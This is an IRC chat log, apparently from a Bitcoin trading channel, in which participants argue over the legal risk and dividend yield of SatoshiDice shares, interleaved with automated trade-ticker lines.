0.404 BTC [-] Mar 24 21:51:39 [BTCTC] [PAJKA.BOND] 3 @ 0.100001 = 0.3 BTC [-] Mar 24 21:51:45 lol maybe your world is...in my experience Mar 24 21:51:54 there are cayman accounts...swiss accounts... Mar 24 21:51:59 money laundering Mar 24 21:52:03 drug trafficking Mar 24 21:52:06 IP theft Mar 24 21:52:08 all of them report to US. Mar 24 21:52:12 and they do nothing about them Mar 24 21:52:21 yes they do Mar 24 21:52:24 they can't stop a guy smoking a joint or downloading a song Mar 24 21:52:42 nope but they can take down the source Mar 24 21:52:46 which has precedent Mar 24 21:52:46 yep Mar 24 21:52:54 no more columbian coke in US for sure Mar 24 21:52:58 they took it out at the source Mar 24 21:53:02 theres a reason americans cant open foreign bank accounts Mar 24 21:53:06 they did take out the source. Mar 24 21:53:07 and that is a physical substance Mar 24 21:53:11 yes we can Mar 24 21:53:14 oh shit Mar 24 21:53:15 the original cartel operators from 15 years ago are all dead Mar 24 21:53:16 open foreign bank accounts Mar 24 21:53:23 go try Mar 24 21:53:23 and yet coke is still here Mar 24 21:53:25 as is weed Mar 24 21:53:26 how did i pull off opening a foreign bank account? Mar 24 21:53:28 !!?? Mar 24 21:53:37 arrest him! Mar 24 21:53:38 lol you are ridiculously trolling now Mar 24 21:53:41 mjr: from another cartel opening up Mar 24 21:53:47 exactly Mar 24 21:53:49 we are betting that they can't take down all sources for everything. too expensive and ineffective Mar 24 21:53:52 the source can't be shut down Mar 24 21:53:53 mjr: the coke cartels from 15-20 years ago are all DEAD. Mar 24 21:54:01 soviets tried that, filed and bankrupted in the end Mar 24 21:54:04 and yet the market found a way to bring what was requested Mar 24 21:54:09 satoshi can be taken down, and a new one will take its place i agree Mar 24 21:54:16 but shareholders of the first will be at 0. Mar 24 21:54:22 i doubt that Mar 24 21:54:26 tiberiusiv: why do you think americans can't open forign bank accounts? Mar 24 21:54:28 but again, that is why i risk my capital Mar 24 21:54:39 smickles: it's gotta be a troll Mar 24 21:54:50 smickles: majority of banks in the world do not want the regulatory headache of dealing with US citizens. Mar 24 21:54:56 everyone everywhere knows that we open bank accounts all across the world Mar 24 21:55:01 smickles: please read the laws over the last few years Mar 24 21:55:10 they changed alot Mar 24 21:55:13 tiberiusiv: what prevents evoorhees selling satoshidice to someone anon in the worst case? Mar 24 21:55:22 ThickAsThieves: you conclusion does not follow from your premises Mar 24 21:55:23 tiberiusiv: so wait...since those banks CHOOSE not to deal with headaches...we are not legally able to open an account? Mar 24 21:55:27 er Mar 24 21:55:29 tiberiusiv: Mar 24 21:55:29 jurov: nothing. Mar 24 21:55:35 sry ThickAsThieves Mar 24 21:55:43 np Mar 24 21:55:51 you're still under arrest dont worry Mar 24 21:56:03 tiberiusiv: i opend a french and a UK bank account just a month ago Mar 24 21:56:06 it's obvious that the one whose fallacious assumptions is not ThickAsThieves Mar 24 21:56:09 easy as pie Mar 24 21:56:33 smickles: at major banks who comply with US reporting requirements. Mar 24 21:56:57 tiberiusiv: so you admit your conclusion was just plain wrong then? Mar 24 21:56:59 [BTCTC] [S.DICE-PT] 100 @ 0.004 = 0.4 BTC [+] Mar 24 21:56:59 jurov: my point was, the market is indicating a unnaturally high risk factor for sdice going forward. Mar 24 21:57:01 tiberiusiv: it's easy, at the end of the day, to say why things won't work...it only costs you your time on this forum (probably largely offset by the enjoyment you get from trolling), but it's a lot harder to do things that do work Mar 24 21:57:07 "americans can't open forign bank accounts" Mar 24 21:57:31 he forget to say a % Mar 24 21:57:32 jurov: evidenced by the 30% yield Mar 24 21:57:39 lol... Mar 24 21:57:41 drink! Mar 24 21:57:44 tiberiusiv: that is not a great return Mar 24 21:57:48 for this economy Mar 24 21:57:55 i have dollars lent out at almost 300% Mar 24 21:58:01 30% yield on a deflationary asset isnt? Mar 24 21:58:07 yea that is whole economy problem, not just satoshidice Mar 24 21:58:07 bitcoin alone would yield more Mar 24 21:58:12 your dollars did not gain 10x. Mar 24 21:58:24 satoshi dice dividend has been over 300% in real terms. Mar 24 21:58:29 um...if you got in at 17 they gained around 5-6X Mar 24 21:58:39 yes exactly. Mar 24 21:58:55 if you bought satoshi dice the value of your dividends is in real terms is over 300% Mar 24 21:59:04 so how is a 30% yield of BITCOINs not high? Mar 24 21:59:11 imho much bigger factor than fear of regulation is trust problem Mar 24 21:59:18 why am i not high Mar 24 21:59:19 ok it is a good return, and i've been quite happy Mar 24 21:59:38 but i do not conflate the returns of bitcoins with the returns of sdice Mar 24 21:59:49 mjr: the point is its HIGH for a reason, if it was such a A+ asset, much more people would be willing to pay a higher price for it Mar 24 21:59:51 most of those super high returns i would have realized without bitcoins Mar 24 22:00:02 dude: limited market information Mar 24 22:00:03 thereby bringing down the dividend yield(of which you have no clue how it works) Mar 24 22:00:09 yes i do Mar 24 22:00:16 i know a lot better than you it would seem Mar 24 22:00:25 are you saying that "bitcoin subsidizes satoshi dice?" Mar 24 22:00:26 30% return in a deflationary currency like bitcoin is massive Mar 24 22:00:28 no Mar 24 22:00:32 their return is 30% Mar 24 22:00:46 if i hold bitcoins...i get the return on increase in value of bitcoin Mar 24 22:00:53 so you cannot conflate the two Mar 24 22:01:02 yes you can. Mar 24 22:01:10 bitcoins are scarce. Mar 24 22:01:20 30% yield on a SCARCE asset Mar 24 22:01:23 tiberiusiv: so do american stocks take into account the american dollar when the yreport dividends? Mar 24 22:01:25 is massive Mar 24 22:01:27 no Mar 24 22:01:34 mjr: absolutely dollar matters Mar 24 22:01:40 because when evaluating investment opportunities Mar 24 22:01:48 you cannot say the entire economy behind this asset Mar 24 22:01:57 is specific to this asset Mar 24 22:01:59 what are you talking about? Mar 24 22:02:00 for exapmle Mar 24 22:02:04 i could invest in mpoe Mar 24 22:02:08 bitcoins are hard to get Mar 24 22:02:09 and get dividends there Mar 24 22:02:12 or mining bonds Mar 24 22:02:21 so...i have optoins in my investment choice Mar 24 22:02:21 someone paying me 30% a year in income on my capital Mar 24 22:02:22 duuude we're going in circles. just put your bitcoins where your mouth is.. i can provide some s.dice to shorting, too Mar 24 22:02:26 is massive Mar 24 22:02:32 lol exactly Mar 24 22:02:39 unless you fear jail cuz unlicensed securities trading Mar 24 22:02:40 what backs this opinion other than hot air? Mar 24 22:02:43 0 skin in the game Mar 24 22:02:57 so tiberius, does this mean you think sdice is a sound investment? Mar 24 22:02:58 who got dat skin Mar 24 22:02:59 opinions are like assholes Mar 24 22:02:59 mjr i hold sdice shares Mar 24 22:03:08 where da skin at? Mar 24 22:03:08 i dont fall in love with a stock like you do Mar 24 22:03:09 that is so irrational Mar 24 22:03:13 you should sell now Mar 24 22:03:16 thick: its risky Mar 24 22:03:19 i'm not in love with it Mar 24 22:03:28 thicky: people that tend to be married to a stock usually get wiped out Mar 24 22:03:28 its not by any stretch my best performer Mar 24 22:03:40 is it too risky? Mar 24 22:03:50 thick: i wouldnt put large $ into it. Mar 24 22:04:00 tiberiusiv: the point is that management is prob the deciding factor in bitcoin ventures Mar 24 22:04:01 so what DO you invest in? Mar 24 22:04:22 thick: well the other btc business's like mpex are more viable then sdice IMO Mar 24 22:04:37 tiberiusiv, really? if bitcoin isn't game currency Mar 24 22:04:42 that is why you diversify Mar 24 22:04:53 then mpex = unregulated securities trader Mar 24 22:04:55 so mpoe is safest you mean? Mar 24 22:05:03 thick: if you go on the bitcoin talk forums there is already threads sprouting up of people whining over their gambling losses. Mar 24 22:05:14 how is that relevant Mar 24 22:05:19 and that's equally as bas as unregulated gambling Mar 24 22:05:25 thickasthieves: nothing stopping some angry upset satoshidice customer tipping off the feds too Mar 24 22:05:28 ThickAsThieves: just another non sequitur Mar 24 22:05:37 lol Mar 24 22:05:42 tipping of the feds?! Mar 24 22:05:43 LOL tipping them off? i thjought they had the swat team ready Mar 24 22:05:45 off Mar 24 22:05:55 you men they don't know yet? Mar 24 22:05:56 it happens more often then you think Mar 24 22:05:58 buy buy buy Mar 24 22:06:07 sell! Mar 24 22:06:10 drink! Mar 24 22:06:28 i was under the assumption this whole conversation that the feds were aware of satoshi dice Mar 24 22:06:32 jurov: the probability of mpex being around in a few years time is much higher then satoshidice, hence the lower risk profile Mar 24 22:06:37 thank god no one has ever thought to tell the fbi about them Mar 24 22:06:54 [BTCTC] [BTC-MINING] 3 @ 0.05 = 0.15 BTC [+] Mar 24 22:07:17 tiberiusiv how so? Mar 24 22:07:43 jurov if you need that explained to you i dont know what to say. Mar 24 22:07:45 guys, such a stupid point Mar 24 22:07:51 if btc is subject to regulation they are both equally illegal Mar 24 22:07:55 the exchange they trade on...which is the most restrictive Mar 24 22:08:00 thought they were a good investment Mar 24 22:08:11 but if they fail miserably...the exchange would still be fine... Mar 24 22:08:19 this is all stupid Mar 24 22:08:27 the closest thing we have to regulation concern Mar 24 22:08:30 mpex income is not based on sdice mjr Mar 24 22:08:32 is with fiat exchange points Mar 24 22:08:47 ok...so if 33% of the stocks traded on nyse left tomorrow Mar 24 22:08:50 mpex cash cow is the options trading Mar 24 22:08:50 nyse would be just fine Mar 24 22:08:58 no tiberiusiv's argument seems that usg inevitably cracks doen on sdice cuz illegal gambling Mar 24 22:08:58 tiberiusiv: obviously Mar 24 22:09:00 sdice can leave mpex with 0 impact Mar 24 22:09:19 and i'm asking, if illegal gambling, why not illegal securities exchange, too? Mar 24 22:09:22 i don't know about 0 Mar 24 22:09:25 jurov: they will crack down becuase the owners are bragging about profits, residing in the US, and running both the cashier + gaming table. Mar 24 22:09:26 but i thought i was sposed to by mpoe, not sdice Mar 24 22:09:28 but i think both mpex and sdice survive Mar 24 22:09:32 this is so confusing! Mar 24 22:09:36 and mircea isn't bragging? Mar 24 22:09:46 lol Mar 24 22:09:49 tiberiusiv: most casinos run the gaming table and the cashier Mar 24 22:10:02 and they have permission to operate. Mar 24 22:10:06 sdice has none of that Mar 24 22:10:12 and they don't operate here Mar 24 22:10:19 so...non issue? Mar 24 22:10:36 you dont have permission to buy mpex Mar 24 22:10:39 voorhees is a US resident operating a US based cashier service that allows US residents to gamble on an illegal site Mar 24 22:10:46 what cant you comprehend? Mar 24 22:10:49 operating is a strong word Mar 24 22:10:52 thats a jump Mar 24 22:11:03 tiberiusiv: i work at a broker dealer...am i operating a broker dealer? Mar 24 22:11:11 the market is always right. Mar 24 22:11:18 or are the people who OWN the broker dealer operating it Mar 24 22:11:21 tiberius is always right Mar 24 22:11:21 HUGE difference Mar 24 22:11:21 and its definately indicating concerns Mar 24 22:11:24 lol Mar 24 22:11:49 anyways we will see Mar 24 22:12:00 the point is this... tiberiusiv constantly casts doubt about things, but usually has logical flaws that are obvious...when confronted, he finds other doubts...also flawed Mar 24 22:12:20 its the troll shuffle Mar 24 22:12:21 there is no one who OWNS bitinstant who also OWNS SDICE Mar 24 22:12:22 < tiberiusiv> what cant you comprehend? << i think they feel you are misrepresenting what is happening Mar 24 22:12:23 if i was wrong, sdice would be 2-3x higher and still offering a great return Mar 24 22:12:24 that we know Mar 24 22:12:34 oh no Mar 24 22:12:47 i think your FUD and others ignorance will keep it trading low for quite a whiloe Mar 24 22:12:54 notice how the dividend yields of the other bitcoin based business's are nowhere near sdice? Mar 24 22:12:56 till good news sstarts coming out Mar 24 22:13:00 tiberiusiv, can't it be just people cashing out of btc generally? all mpex assets went down recently Mar 24 22:13:01 [HAVELOCK] [SDICE] 1 @ 0.52 BTC [+] Mar 24 22:13:10 yes...not to mention... Mar 24 22:13:21 you have to realize that some people have not made money on SDICE Mar 24 22:13:24 jurov: yes but mpex is valued higher then sdice with lower profits... Mar 24 22:13:29 it has plunged from 75 to like 40 Mar 24 22:13:35 there so many places to buy sdice, all you need to do is arb yourself down to market value Mar 24 22:13:38 and dividends in feb where not the best Mar 24 22:13:52 march divs will prob be non-existent Mar 24 22:14:00 so short term investors got out Mar 24 22:14:06 in theory sdice should be the most valuable BTC company at the moment Mar 24 22:14:25 those who appreciate the fact that anyone with that much market share and that great profit margin CAN"T be that cheap Mar 24 22:14:50 and who see your FUD for what it is...know that this is a bargain Mar 24 22:15:01 tiberiusiv the value of the company is not measured in dividends Mar 24 22:15:05 similar to buying bitcoins at $3 Mar 24 22:15:07 tiberiusiv: you know voorhees isn't even the largest shareholder of SD, right? i think he owns significantly less than half Mar 24 22:15:26 he also isn't an owner of bitinstant Mar 24 22:15:28 smickles: great. hes a major player with his name everywhere.. Mar 24 22:15:30 from what i've read Mar 24 22:15:37 it means nothing mjr Mar 24 22:15:52 lol: the "major player" herein referred to as the party of the first Mar 24 22:15:53 lol Mar 24 22:15:56 kakobrekla: dividend yield signals many things Mar 24 22:16:06 dividends means shit Mar 24 22:16:10 got it? Mar 24 22:16:20 you purchase a stock for its future income. Mar 24 22:16:23 yes Mar 24 22:16:31 dividends are not the most important... Mar 24 22:16:42 look at march...0 dividends Mar 24 22:16:51 obv more than one thing factors in Mar 24 22:16:52 tiberiusiv you have lots to learn Mar 24 22:16:59 kako: no i dont Mar 24 22:17:07 by your logic...with a 0% return on investment...it must be the best deal ever Mar 24 22:17:10 yeah you do :) Mar 24 22:17:11 tib just keeps pointing out the one thing no one is mentioniong at the moment Mar 24 22:17:16 and shifts the conv there Mar 24 22:17:17 sdice is more profitable then mpex yet is a less valuable firm for a reason Mar 24 22:17:31 thats called uncertainty Mar 24 22:17:44 tiberiusiv: why is it illegal to play games with bitcoin? Mar 24 22:18:02 why isn't it illegal to play games with wow gold or others like that? Mar 24 22:18:13 you cant just declare its uncertainty Mar 24 22:18:26 think the point that they are making is that sdice is not converting the btc for cash Mar 24 22:19:45 thickasthieves: a simple example, a US blue chip like johnson and johnson will tend to have a lower dividend yield then a lesser quality firm Mar 24 22:20:14 why? because you are more certain to recieve the income from JNJ in the future Mar 24 22:20:22 tiberiusiv: you are assuming financial reporting that is widespread, and liquidity that is many orders of magnitude higher than what we have Mar 24 22:20:38 tiberiusiv: also...investor savvy Mar 24 22:20:38 sdice is one of the most liquid btc assets is it not? Mar 24 22:20:59 tiberiusiv: which is like saying it is less liquid than most pink sheet stocks? Mar 24 22:21:15 i dont get what that has to do with anything Mar 24 22:21:23 but yeah, nice comparison to a NYSE DOW JONES COMPANY Mar 24 22:21:24 I really don't think what SD is doing is illegal, and I'd like to have a firm grasp of why some people do Mar 24 22:21:25 theres no other BTC firms that are paying 10%+ a year... Mar 24 22:21:43 asicminer? Mar 24 22:21:55 whats it paying? Mar 24 22:22:01 also...your returns are decided by what YOU payed Mar 24 22:22:08 don't know Mar 24 22:22:13 but pretty sure more than 10% Mar 24 22:22:17 cavirtex already doubled for some Mar 24 22:22:35 mpoe might be around 10% a year...not sure Mar 24 22:22:43 I don't consider anything regarding moving Bitcoins illegal and won't until I'm told to. For now it's just some virtual tokens. Mar 24 22:22:53 Namworld: Amen Mar 24 22:22:57 So SD is also not doing anything wrong Mar 24 22:23:00 casino chips are tokens too Mar 24 22:23:14 tiberiusiv: that you can cash out through the casino with Mar 24 22:23:18 based on that premise people can run gaming tables in their basements using tokens Mar 24 22:23:27 and have someone operate a cashier service in another town Mar 24 22:23:27 Casino chips have a fixed USD value and are sold/bought by the casino Mar 24 22:23:39 hint hint...they do, it's called poker night Mar 24 22:23:43 They're a proxy for USD for easier use at the table Mar 24 22:23:58 poker night is allowed as long as its not a regular occurance Mar 24 22:24:05 and you arent allowed to take a rake Mar 24 22:24:09 once weekly with your mates? Mar 24 22:24:18 also its a good example because casinos are exchanging fiat for chips anyway Mar 24 22:24:20 actually card tables are legal Mar 24 22:24:21 theres nothing wrong with that Mar 24 22:24:21 casino chips are provided in an wholly different environment than Bitcoin Mar 24 22:24:23 whcih sdice does not do Mar 24 22:24:36 BTC is virtual token with no fixed value. Some people happen to want to buy it. They don't have a definite USD value however, they're just valueless tokens unbacked by any entity. Mar 24 22:24:40 since poker is a game of skill in a lot of jurisdictions Mar 24 22:24:45 it's a complete shit analogy: pokerchips and bitcoin Mar 24 22:24:48 they arent valueless Mar 24 22:24:58 see there is the non sequitur Mar 24 22:25:06 the casino BACKS the value of the chip Mar 24 22:25:10 sdice DOESN"T Mar 24 22:25:27 the casino cannot say "those chips are worth 30 Mar 24 22:25:29 they dont have to Mar 24 22:25:31 % more today Mar 24 22:25:43 fixed exchange set by and guaranteed by the issuer Mar 24 22:25:47 another distinction Mar 24 22:25:48 They're not in the sense that people want to buy them so you can sell them. But there's no one backing Bitcoins. Mar 24 22:25:49 btc can be freely exchanged for dollars, just becuase sdice isnt doing the exchanging doesnt mean anything Mar 24 22:25:51 the casino ISSUES Mar 24 22:26:06 mjr you are argueing semantics Mar 24 22:26:06 a chip is issued by a casino Mar 24 22:26:27 tiberiusiv: another flawed argument that causes you to jump to another shaky brance Mar 24 22:26:29 There's nothing in a Bitcoin and no backing. In that sense, they're valueless until sold. Mar 24 22:26:30 branch Mar 24 22:26:44 look at this example. your friend living 10 miles from you, sells chips which can be used at YOUR basement casino far away from him Mar 24 22:26:50 you can say its just play money Mar 24 22:26:50 If no one takes it for money, they're worth nothing. No one backs it. Mar 24 22:27:07 remember that site that allowed trading 'stock' in any website? Mar 24 22:27:29 you could buy/sell shares in curry.com, or w/e Mar 24 22:27:39 They're not unlike game currencies. They're worth nothing, just used in a game. You don't pay tax on what you earn in a virtual game. Mar 24 22:27:39 i'll leave it where kakobrekla was smart enough to...you don't really know what you are talking about Mar 24 22:27:43 and people would pay actual money for those shares Mar 24 22:27:49 that wasn't illegal Mar 24 22:28:13 as i said, the market shares my opinion of higher then normal risk with sdice shares. Mar 24 22:28:14 it wasn't illegal just because there was a real money market for the stock Mar 24 22:28:16 this would be a great example of logical fallacies though if anyone saves the log Mar 24 22:28:17 thats all that matters discussion over Mar 24 22:28:22 straw man arguments Mar 24 22:28:27 false dichotomires Mar 24 22:28:30 dichotomies Mar 24 22:28:46 Well let him be with his beliefs. He can invest however he wants. Mar 24 22:28:49 mjr: if the market did not share concerns about sdice the price would be 2-3x higher. Mar 24 22:29:01 tiberiusiv: how do you prove that Mar 24 22:29:02 ? Mar 24 22:29:04 srsly? Mar 24 22:29:06 the one fatal flaw is this Mar 24 22:29:11 i told you from the high dividend yield Mar 24 22:29:14 you say the market is always right Mar 24 22:29:18 that cannot be Mar 24 22:29:21 if it changes Mar 24 22:29:24 its abnormaly high meaning FUTURE income is shaky at best Mar 24 22:29:37 if sdice was a licensed company it would probably be much higher Mar 24 22:29:39 the market is not perfectly efficient Mar 24 22:29:44 yea, they could have a run of bad luck Mar 24 22:29:47 it is not perfectly liquid Mar 24 22:29:50 there income is not guaranteed Mar 24 22:29:56 er, spelling Mar 24 22:29:59 smickles: i know nothing is guaranteed Mar 24 22:30:08 the point is, that people who EXPECT things to look different in the future Mar 24 22:30:10 but its abormally high yield Mar 24 22:30:18 especially for a proven moneymaker thats around for about 12months now Mar 24 22:30:20 abnormally high is subjective Mar 24 22:30:23 also there have been concerns about the higher usd/btc impacting their volume Mar 24 22:30:30 confidence should be much higher Mar 24 22:30:39 well dollar value of bets has been increasing if i remember correctly\ Mar 24 22:30:48 yes exactly Mar 24 22:30:51 although btc has gone down Mar 24 22:30:54 i believe the uncertainty lies elsewhere Mar 24 22:31:00 not in their legal status Mar 24 22:31:13 if it did the yield would be 15% Mar 24 22:31:14 not 25-30+ Mar 24 22:31:16 lol, to hold the majority of people who use btc to the level of expertise of a mature market is simply foolish Mar 24 22:31:27 and also, the market is fickel, ;you can't use that as evidence to their legality Mar 24 22:31:29 so now you are blaming the market mjr Mar 24 22:31:37 for fucks sake, it typically trades its lowest right before divs, and higher right after Mar 24 22:31:45 market participants are simply stating an opinion with X price Mar 24 22:31:55 mjr: all stocks do that Mar 24 22:32:01 ok...with 5 market participants...how well can we do price discovery Mar 24 22:32:03 its called ex-dividend Mar 24 22:32:07 NO... Mar 24 22:32:15 sdice has 5 market participants? Mar 24 22:32:17 ex dividend means i trade HIGHEST right before dividend Mar 24 22:32:24 right after Mar 24 22:32:35 after dividend, price is low Mar 24 22:32:37 because of TVM Mar 24 22:32:47 before it is higher, pricing in immediate payoff Mar 24 22:32:52 sdice does the exact opposite Mar 24 22:32:55 sdice does decent volumes doesnt it? Mar 24 22:32:58 its on like 3 exchanges Mar 24 22:33:01 sell off BEFORE dividend Mar 24 22:33:06 big buys right after Mar 24 22:33:17 look at its price over time Mar 24 22:33:21 if i was voorhees id be on a plane along time ago Mar 24 22:33:27 thats all im saying Mar 24 22:33:36 that is obvious evidence of immature market participants Mar 24 22:33:39 so tiberiusiv care to say why it's illegal? Mar 24 22:33:44 who don't understand TVM Mar 24 22:34:01 [HAVELOCK] [VTX] 1 @ 0.74479996 BTC [-] Mar 24 22:34:16 have you found a place that accepts btc for aluminium foil? Mar 24 22:34:42 i mean, we were talking about that, then you tried to say that the market on S.DICE is evidence of SD's illegality Mar 24 22:34:58 S.DICE is just what one shareholder of SD is doing with some of his shares Mar 24 22:35:59 that is the point...if you think most people, and obviously most people in this convo are excluded from this point, who trade sdice do any sort of fundamental analysis or even have traded stocks before...i'd say that is optimistic Mar 24 22:36:11 tiberiusiv: also, evooorhees has been on a plane a long time ago Mar 24 22:36:18 majority are learning finance for the first time Mar 24 22:36:21 he went to china, morocco, paris Mar 24 22:36:25 vegas Mar 24 22:36:29 dubai Mar 24 22:36:39 at these plases he sold shars of SD Mar 24 22:36:45 and soon parts southern Mar 24 22:37:04 he got backing from major gamblers and indirect money from one casino Mar 24 22:37:14 he advertised Mar 24 22:37:24 in print media, conventions etc Mar 24 22:37:39 he's also obtained legal advice in this matter Mar 24 22:37:46 all this outside the realm of S.DICE Mar 24 22:37:47 ie. people who are payed to review stuff like what you spout Mar 24 22:38:00 i don't think S.DICE represents the market value of SD at all Mar 24 22:38:17 considering >90% of sales have been off of S.DICE Mar 24 22:38:31 but all this is a side issue Mar 24 22:38:37 why do you think it's illegal? Mar 24 22:38:45 thank you smickles Mar 24 22:40:35 smickles: i meant not being a US resident Mar 24 22:42:00 [HAVELOCK] [HIM] 3 @ 2 = 6 BTC [+] Mar 24 22:43:29 do you think it's illegal? Mar 24 22:43:50 [BTCTC] [B.YABMC] 1 @ 0.0197 BTC [-] Mar 24 22:44:08 [BTCTC] [BTC-BOND] 1 @ 0.009899 BTC [+] Mar 24 22:44:09 smickles: i already explained my position. Mar 24 22:44:15 quit going in circles Mar 24 22:44:27 ok, so you don't have a good reason then Mar 24 22:44:59 the reason I was asking was that I don't believe you gave good justification for your position Mar 24 22:44:59 i already told you, voorhees is running an illegal gaming operation under US laws, while being a subject of the united states. Mar 24 22:45:04 you play with fire you get burnt. Mar 24 22:45:35 "Well, if activity is unusual 10 times a day then something is wrong with your unusually-mometer" re: mt. gox's response to lag... Mar 24 22:45:35 so the owners of forign casino's cant be in america? Mar 24 22:45:36 gonna be a great publicity for SD Mar 24 22:45:49 even assuming SD qualifies as a casion Mar 24 22:45:55 smickles: they tend not to be Mar 24 22:46:05 or are anonymous Mar 24 22:46:18 tiberiusiv: that seems quite wrong Mar 24 22:46:42 smickles: most major online gaming places are licensed in a particular jurisdiction Mar 24 22:46:49 In Canada, you're taxed on 50% of your gains. Not 100%. But you can get as much as 43% tax on that 50% if you're in the top income bracket. So as high as 21.5% on gains... hmm, interesting. Mar 24 22:46:51 and incorporated in anonymous areas Mar 24 22:47:00 I guess it's not that bad... but not excellent Mar 24 22:47:16 namworld: quebec have added capital gains on top of that? Mar 24 22:47:29 quebec has its own revenue collection Mar 24 22:47:58 tiberiusiv: so the people who own the casino's in morocco can't come to america w/o fear of being arrested? Mar 24 22:48:23 smickles: sure they can come to US Mar 24 22:48:38 w/o fear of being arrested? Mar 24 22:48:48 why would they be they arent doing anything illegal Mar 24 22:48:54 exactly Mar 24 22:49:04 voorhees is and he is under US jurisdiction Mar 24 22:49:08 not egypt Mar 24 22:49:24 So does other provinces. They have provincial tax/sales tax depending on provinces Mar 24 22:49:26 SD doesn't operate in 'merica Mar 24 22:49:30 I'd have to check for Quebec Mar 24 22:49:37 online gaming houses that cater to US customers, tend to stay away from the US.. Mar 24 22:49:41 the personal Mar 24 22:50:01 and that lesson was taught during black thursday or friday Mar 24 22:50:05 when those poker sites got owned Mar 24 22:50:19 the warning is loud and clear smickles. Mar 24 22:50:35 if you alread said why you think SD is illegal, can you at least give me a timecode so i can grep it Mar 24 22:50:55 i dont think its illegal, im simply stating the position of the US government Mar 24 22:51:05 of which voorhees is a subject to since he is residing there Mar 24 22:51:13 and most of his customers are from there Mar 24 22:51:43 you referenced black friday Mar 24 22:51:54 it wouldnt take longer then 1 month for motivated US authorities to put a case against voorhees together Mar 24 22:51:55 which is when BANKS couldn't transfer money to or from online gambling sights Mar 24 22:51:55 why is SD illegal under us law then? Mar 24 22:52:06 even if voorhees won the case Mar 24 22:52:11 the business would still be ruined Mar 24 22:52:15 why? Mar 24 22:52:26 during the years of the ongoing trial.. Mar 24 22:52:27 i bet it'd be running the whole time the case went on Mar 24 22:52:35 i won! first big win for bitcoin...oh no one wants the company? Mar 24 22:52:38 maybe a different variant Mar 24 22:52:46 no Mar 24 22:52:49 SD proper Mar 24 22:52:51 would be running, by more cautious people Mar 24 22:52:58 no Mar 24 22:53:00 SD proper Mar 24 22:53:09 why do i keep getting sucked back in (FUD, obvious refutations, repeat) Mar 24 22:53:29 SD would likely keep running at the same BTC addresses the whole time Mar 24 22:53:57 that is the point...btc can't really be stopped from flowing to SDICE Mar 24 22:53:59 even if voorhees were jailed the whole time Mar 24 22:54:07 nor could they seize the btc Mar 24 22:54:24 which is the only part of black friday that had any sting Mar 24 22:55:03 point is the value of the shares would collapse Mar 24 22:55:13 what happens later makes no difference Mar 24 22:55:19 yep, panic can do that...then stronger hands buy Mar 24 22:55:20 there would be losses Mar 24 22:55:27 and the price rebounds Mar 24 22:55:41 you only take a "loss" when you sell Mar 24 22:56:06 except in cases of mark to market which is usually due to margin requirements Mar 24 22:56:06 so if voorhees is jailed, and the service keeps running as if nothing happened, you think the price would drop for any significant lenght of time? Mar 24 22:56:37 i think mpex shares took a dive from missing out on 2 major IPOs Mar 24 22:56:44 but wait...assuming he is not in the US...you are saying the try to extradite? Mar 24 22:56:47 that would be a real show of strength to my mind, SD keeps going even after the US GOV't tried to shut it down Mar 24 22:56:58 that cavirtex and asicminer Mar 24 22:57:23 so is havelock a stockexchange or funds? Mar 24 22:57:28 hah, you still think S.DICE represents the value of SD shares? Mar 24 22:57:28 did not realize that asic miner IPO'd recently Mar 24 22:57:42 or whenever they listed Mar 24 22:57:43 thought they started on GLBSE Mar 24 22:57:45 S.DICE doesn't even have voting power Mar 24 22:57:55 tiberiusiv: they arn't listed Mar 24 22:58:08 read S.DICE's contract Mar 24 22:58:08 smickles: when what is the asicminer? Mar 24 22:58:12 then* Mar 24 22:58:31 smickles im talking about asicminer.. Mar 24 22:58:35 thought asicminer was on btctc.co or however its spelled and bitfunder Mar 24 22:58:43 all the assicminer shares out on 'the market' arn't actual shares of asicminer eithr Mar 24 22:58:56 ThickAsThieves: you have severely misunderstood what all is hapening here Mar 24 22:59:00 er tiberiusiv Mar 24 22:59:00 so if sdice doesnt represent sd shares what do they represent? Mar 24 22:59:08 it's a game Mar 24 22:59:16 ok Mar 24 22:59:18 read the contract Mar 24 22:59:29 read the contract of all those asicminer things Mar 24 22:59:30 i asked you what the shares represent Mar 24 22:59:38 tokens in the game Mar 24 22:59:48 which get you a share of game profits Mar 24 22:59:53 which are bitcoins Mar 24 23:00:11 asicminer proper is a private company Mar 24 23:00:14 which are fully convertible into fiat currency Mar 24 23:00:23 anything is convertible to fiat Mar 24 23:00:36 wow gold and zynga credits included Mar 24 23:00:39 it is the party tht converts it that govs are looking at Mar 24 23:00:47 not sdice Mar 24 23:00:56 no they arent Mar 24 23:01:01 yes they are Mar 24 23:01:03 they simply stated taht exchanges have to follow AML laws Mar 24 23:01:07 which the major ones already did Mar 24 23:01:20 or, sry, confusion in who you were talking at Mar 24 23:01:24 nobody stated online gambling is now legal if you use bitcoins. Mar 24 23:01:38 show a case precedent Mar 24 23:02:01 so if WoW has a poker game inside using WoW gold, thats illegal too? Mar 24 23:02:19 tiberiusiv: why is the use of wow gold legal even tho you can convert them to fiat and the issuer doesn't do that conversion Mar 24 23:02:29 if they are running commercial gambling ventures then yes it would be thickasthieves Mar 24 23:02:36 if its a casual gathering of friends its perfectly legal Mar 24 23:02:46 once you start operating a gambling house for the sole purpose of profit it becomes illegal Mar 24 23:03:15 smickles: theres nothing illegal about bitcoins themselves nor exchanging them Mar 24 23:03:17 look at what blizzard is doing, you play a game, there is a chance you get coins Mar 24 23:03:17 if Microsoft sells me a poker exe and accepts fiat for that purchase is that illegal too? Mar 24 23:03:18 ... Mar 24 23:03:33 no they are earning $ from software Mar 24 23:03:35 you can sell those coins for fiat Mar 24 23:03:36 not from gambling proceeds. Mar 24 23:04:08 smickles: you arent logging onto WoW to play poker or toss dice, or guess numbers. Mar 24 23:04:10 how is SD not earning btc from their software? Mar 24 23:04:26 they arent selling software Mar 24 23:04:33 tiberiusiv: it's still up to chance if and how many coins you get in wow Mar 24 23:04:35 they earn a % of total bet volume Mar 24 23:05:05 also, blizzard makes money off of the gold directly in the real money markets Mar 24 23:05:18 theres nothing wrong with that Mar 24 23:05:19 (or is that diablo?) Mar 24 23:05:36 point is, to really simplify...whoever converts bears resonsibility for tax and aml Mar 24 23:05:40 so they take a cut of people using wow gold, it's ok Mar 24 23:05:44 blizzard is not running a game of chance Mar 24 23:05:44 where they promise people payout multiples Mar 24 23:05:47 sdice...no conversion, no responsibility Mar 24 23:05:50 sd takes a cut of people using bitcoin, it's not ok Mar 24 23:05:52 diablo i think Mar 24 23:06:13 actually same exact standard that almost all btc gambling has been operating under Mar 24 23:06:15 bitzino Mar 24 23:06:18 etc Mar 24 23:06:20 smickes: SD dice takes a cut from running a game of chance and promoting large payout multiples Mar 24 23:06:22 diablo legendary 